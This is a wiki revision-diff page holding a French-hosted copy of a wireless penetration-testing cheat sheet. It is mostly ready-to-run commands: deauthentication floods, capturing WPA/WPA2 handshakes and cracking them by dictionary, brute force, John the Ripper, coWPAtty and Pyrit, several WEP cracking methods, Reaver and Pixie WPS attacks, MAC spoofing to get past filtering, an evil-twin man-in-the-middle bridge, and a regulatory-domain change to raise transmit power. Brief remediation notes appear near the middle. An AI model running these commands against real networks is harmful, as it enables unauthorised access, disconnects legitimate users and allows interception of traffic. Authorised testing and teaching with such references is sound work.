Différences

Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.

--- cheatsheet_wifi [2021/12/09 13:51]
M0N5T3R créée
+++ cheatsheet_wifi [2021/12/09 13:59] (Version actuelle)
M0N5T3R
@@ Ligne 1: / Ligne 1: @@
-Cette page est un fork de https://github.com/OlivierLaflamme/Cheatsheet-God/blob/master/Cheatsheet_WirelessTesting.txt
+Cette page est un fork de https://uceka.com/2014/05/12/wireless-penetration-testing-cheat-sheet/
+**WPA2 PSK attack with aircrack-ng suite.**
-WPA2 PSK attack with aircrack-ng suite.
 ---------------------------------------
 ifconfig wlan1 # check wireless IFace
 sudo airmon-ng check kill  # kill issue causing processes
 sudo airmon-ng start wlan1 # start monitor mode
 sudo airodump-ng wlan1mon  # start capturing
 sudo airodump-ng --bssid 64:66:B3:6E:B0:8A -c 11 wlan1mon -w output
 sudo aireplay-ng --deauth 5 -a 64:66:B3:6E:B0:8A wlan1mon   # deauthenticate the client
 sudo aircrack-ng output-01.cap dict # crack the passphrase
-WPA PSK attack with aircrack-ng suite.
+**WPA PSK attack with aircrack-ng suite.**
 --------------------------------------
 Place your wireless card into Monitor Mode
 airmon-ng start wlan0
 Detect all available wireless AP’s and clients
 airodump-ng mon0
 Setting adapter channel
 iwconfig mon0 channel <channel_number>
 Capturing the four-way handshake
 airodump-ng --channel <channel_number> --bssid <bssid> --write capture mon0
 You can capture the handshake passively (it takes time) or de-authenticate a client.
 De-authentication attack
 aireplay-ng --deauth 3 -a <BSSID> -c <client_mac> mon0
 Deauth every client - aireplay-ng -0 5 -a <bssid> mon0
 Dictionary Attack
 aircrack-ng -w passwords.lst capture-01.cap
 Brute force Attack
 crunch 8 8 0123456789 | aircrack-ng -e "Name of Wireless Network" -w - /root/home/wpa2.eapol.cap
-WEP attack with aircrack-ng suite.
+**WEP attack with aircrack-ng suite.**
 ----------------------------------
 Place your wireless card into Monitor Mode
 airmon-ng start wlan0
 Detect all available wireless AP’s and clients
 airodump-ng mon0
 Setting adapter channel
 iwconfig mon0 channel <channel_number>
 airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)
 aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
 aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
 aircrack-ng -b (bssid) (file name-01.cap)
-Rogue Access Point Testing
+**Rogue Access Point Testing**
 --------------------------
 # ifconfig wlan0 down
 # iw reg set BO
 # iwconfig wlan0 txpower 0
 # ifconfig wlan0 up
 # airmon-ng start wlan0
 # airodump-ng --write capture mon0
 root@backbox:/home/backbox# ifconfig wlan1 down
 root@backbox:/home/backbox# iw reg set BO
 root@backbox:/home/backbox# ifconfig wlan1 up
 root@backbox:/home/backbox# iwconfig wlan1 channel 13
 root@backbox:/home/backbox# iwconfig wlan1 txpower 30
 root@backbox:/home/backbox# iwconfig wlan1 rate 11M auto
-Reaver
+**Reaver**
 ------
 airmon-ng start wlan0
 airodump-ng wlan0
 reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv
 reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -S --no-nacks -d7 -vv -c 1
-Pixie WPS
+**Pixie WPS**
 ---------
 airmon-ng check
 airmon-ng start wlan0
 airodump-ng wlan0mon --wps
 reaver -i wlan0mon -c 11 -b 00:00:00:00:00:00 -K 1
-Wireless Notes
+**Wireless Notes**
 --------------
 Wired Equivalent Privacy (WEP)
 RC4 stream cipher w/ CRC32 for integrity check
 - Attack:
 By sniffing an ARP packet, then replaying it to get many encrypted replies with different IVs.
 - Remediation:
 Use WPA2
 Wifi Protected Access (WPA)
 Temporal Key Integrity Protocol (TKIP) Message Integrity Check
 - Attack:
 Uses a four way handshake, and if that handshake can be captured, then a dictionary attack ban be mounted to find the Pairwise Master Key for the Access Point and client Station.
 - Remediation:
 Use long-keys
 Wifi Protected Access 2 (WPA2)
 Advanced Encryption Standard (AES)
 - Attack:
 Uses a four way handshake, and if that handshake can be captured, then a dictionary attack ban be mounted to find the Pairwise Master Key for the Access Point and client Station.
 - Remediation:
 WPA-Enterprise
 ----------------------------------------------------------
 all credits to @uceka.com for the following section (found below) original work found here https://uceka.com/2014/05/12/wireless-penetration-testing-cheat-sheet/
 ----------------------------------------------------------
-WIRELESS ANTENNA
+**WIRELESS ANTENNA**
 ----------------
 Open the Monitor Mode
 root@uceka:~# ifconfig wlan0mon down
 root@uceka:~# iwconfig wlan0mon mode monitor
 root@uceka:~# ifconfig wlan0mon up
 Increase Wi-Fi TX Power
 root@uceka:~# iw reg set B0
 root@uceka:~# iwconfig wlan0 txpower <NmW|NdBm|off|auto>
 #txpower is 30 (generally)
 #txpower is depends your country, please googling
 root@uceka:~# iwconfig
 Change WiFi Channel
 root@uceka:~# iwconfig wlan0 channel <SetChannel(1-14)>
-WEP CRACKING
+**WEP CRACKING**
 ------------
 Method 1 : Fake Authentication Attack
 root@uceka:~# airmon-ng start wlan0
 root@uceka:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
 #What’s my mac?
 root@uceka:~# macchanger --show wlan0mon
 root@uceka:~# aireplay-ng -1 0 -a <BSSID> -h <OurMac> -e <ESSID> wlan0mon
 root@uceka:~# aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <BSSID> -h <OurMac> wlan0mon
 root@uceka:~# aircrack-ng -b <BSSID> <PCAP_of_FileName>
 Method 2 : ARP Replay Attack
 root@uceka:~# airmon-ng start wlan0
 root@uceka:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
 #What’s my mac?
 root@uceka:~# macchanger --show wlan0mon
 root@uceka:~# aireplay-ng -3 -x 1000 -n 1000 -b <BSSID> -h <OurMac> wlan0mon
 root@uceka:~# aircrack-ng -b <BSSID> <PCAP_of_FileName>
 Method 3 : Chop Chop Attack
 root@uceka:~# airmon-ng start wlan0
 root@uceka:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
 #What’s my mac?
 root@uceka:~# macchanger --show wlan0mon
 root@uceka:~# aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <OurMac> wlan0mon
 root@uceka:~# aireplay-ng -4 -b <BSSID> -h <OurMac> wlan0mon
  #Press ‘y’ ;
 root@uceka:~# packetforge-ng -0 -a <BSSID> -h <OurMac> -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
 root@uceka:~# aireplay-ng -2 -r <FileName2> wlan0mon
 root@uceka:~# aircrack-ng <PCAP_of_FileName>
 Method 4 : Fragmentation Attack
 root@uceka:~# airmon-ng start wlan0
 root@uceka:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
 #What’s my mac?
 root@uceka:~# macchanger --show wlan0mon
 root@uceka:~# aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <OurMac> wlan0mon
 root@uceka:~# aireplay-ng -5 -b <BSSID> -h < OurMac > wlan0mon
 #Press 'y' ;
 root@uceka:~# packetforge-ng -0 -a <BSSID> -h < OurMac > -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
 root@uceka:~# aireplay-ng -2 -r <FileName2> wlan0mon
 root@uceka:~# aircrack-ng <PCAP_of_FileName>
 Method 5 : SKA (Shared Key Authentication) Type Cracking
 root@uceka:~# airmon-ng start wlan0
 root@uceka:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
 root@uceka:~# aireplay-ng -0 10 -a <BSSID> -c <VictimMac> wlan0mon
 root@uceka:~# ifconfig wlan0mon down
 root@uceka:~# macchanger --mac <VictimMac> wlan0mon
 root@uceka:~# ifconfig wlan0mon up
 root@uceka:~# aireplay-ng -3 -b <BSSID> -h <FakedMac> wlan0mon
 root@uceka:~# aireplay-ng --deauth 1 -a <BSSID> -h <FakedMac> wlan0mon
 root@uceka:~# aircrack-ng <PCAP_of_FileName>
-WPA / WPA2 CRACKING
+**WPA / WPA2 CRACKING**
 -------------------
 Method 1 : WPS Attack
 root@uceka:~# airmon-ng start wlan0
 root@uceka:~# apt-get install reaver
 root@uceka:~# wash -i wlan0mon -C
 root@uceka:~# reaver -i wlan0mon -b <BSSID> -vv -S
 #or, Specific attack
 root@uceka:~# reaver -i -c <Channel> -b <BSSID> -p <PinCode> -vv -S
 Method 2 : Dictionary Attack
 root@uceka:~# airmon-ng start wlan0
 root@uceka:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
 root@uceka:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon
 root@uceka:~# aircrack-ng -w <WordlistFile> -b <BSSID> <Handshaked_PCAP>
 Method 3 : Crack with John The Ripper
 root@uceka:~# airmon-ng start wlan0
 root@uceka:~# airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
 root@uceka:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon
 root@uceka:~# cd /pentest/passwords/john
 root@uceka:~# john -wordlist=<Wordlist> --rules -stdout|aircrack-ng -0 -e <ESSID> -w - <PCAP_of_FileName>
 Method 4 : Crack with coWPAtty
 root@uceka:~# airmon-ng start wlan0
 root@uceka:~# airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
 root@uceka:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon
 root@uceka:~# cowpatty -r <FileName> -f <Wordlist> -2 -s <SSID>
 root@uceka:~# genpmk -s <SSID> -f <Wordlist> -d <HashesFileName>
 root@uceka:~# cowpatty -r <PCAP_of_FileName> -d <HashesFileName> -2 -s <SSID>
 Method 5 : Crack with Pyrit
 root@uceka:~# airmon-ng start wlan0
 root@uceka:~# airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
 root@uceka:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon
 root@uceka:~# pyrit -r<PCAP_of_FileName> -b <BSSID> -i <Wordlist> attack_passthrough
 root@uceka:~# pyrit -i <Wordlist> import_passwords
 root@uceka:~# pyrit -e <ESSID> create_essid
 root@uceka:~# pyrit batch
 root@uceka:~# pyrit -r <PCAP_of_FileName> attack_db
 Method 6 : Precomputed WPA Keys Database Attack
 root@uceka:~# airmon-ng start wlan0
 root@uceka:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
 root@uceka:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon
 root@uceka:~# kwrite ESSID.txt
 root@uceka:~# airolib-ng NEW_DB --import essid ESSID.txt
 root@uceka:~# airolib-ng NEW_DB --import passwd <DictionaryFile>
 root@uceka:~# airolib-ng NEW_DB --clean all
 root@uceka:~# airolib-ng NEW_DB --stats
 root@uceka:~# airolib-ng NEW_DB --batch
 root@uceka:~# airolib-ng NEW_DB --verify all
 root@uceka:~# aircrack-ng -r NEW_DB <Handshaked_PCAP>
-FIND HIDDEN SSID
+**FIND HIDDEN SSID**
 ----------------
 root@uceka:~# airmon-ng start wlan0
 root@uceka:~# airodump-ng -c <Channel> --bssid <BSSID> wlan0mon
 root@uceka:~# aireplay-ng -0 20 -a <BSSID> -c <VictimMac> wlan0mon
 ##BYPASS MAC FILTERING
 root@uceka:~# airmon-ng start wlan0
 root@uceka:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
 root@uceka:~# aireplay-ng -0 10 --a <BSSID> -c <VictimMac> wlan0mon
 root@uceka:~# ifconfig wlan0mon down
 root@uceka:~# macchanger --mac <VictimMac> wlan0mon
 root@uceka:~# ifconfig wlan0mon up
 root@uceka:~# aireplay-ng -3 -b <BSSID> -h <FakedMac> wlan0mon
-MAN IN THE MIDDLE ATTACK
+**MAN IN THE MIDDLE ATTACK**
 ------------------------
 root@uceka:~# airmon-ng start wlan0
 root@uceka:~# airbase-ng -e “<FakeBSSID>” wlan0mon
 root@uceka:~# brctl addbr <VariableName>
 root@uceka:~# brctl addif <VariableName> wlan0mon
 root@uceka:~# brctl addif <VariableName> at0
 root@uceka:~# ifconfig eth0 0.0.0.0 up
 root@uceka:~# ifconfig at0 0.0.0.0 up
 root@uceka:~# ifconfig <VariableName> up
 root@uceka:~# aireplay-ng -deauth 0 -a <victimBSSID> wlan0mon
 root@uceka:~# dhclient3 <VariableName> &
 root@uceka:~# wireshark &
 ;select <VariableName> interface

Zenk - Security

Outils d'utilisateurs

Outils du Site

Différences

Outils de la Page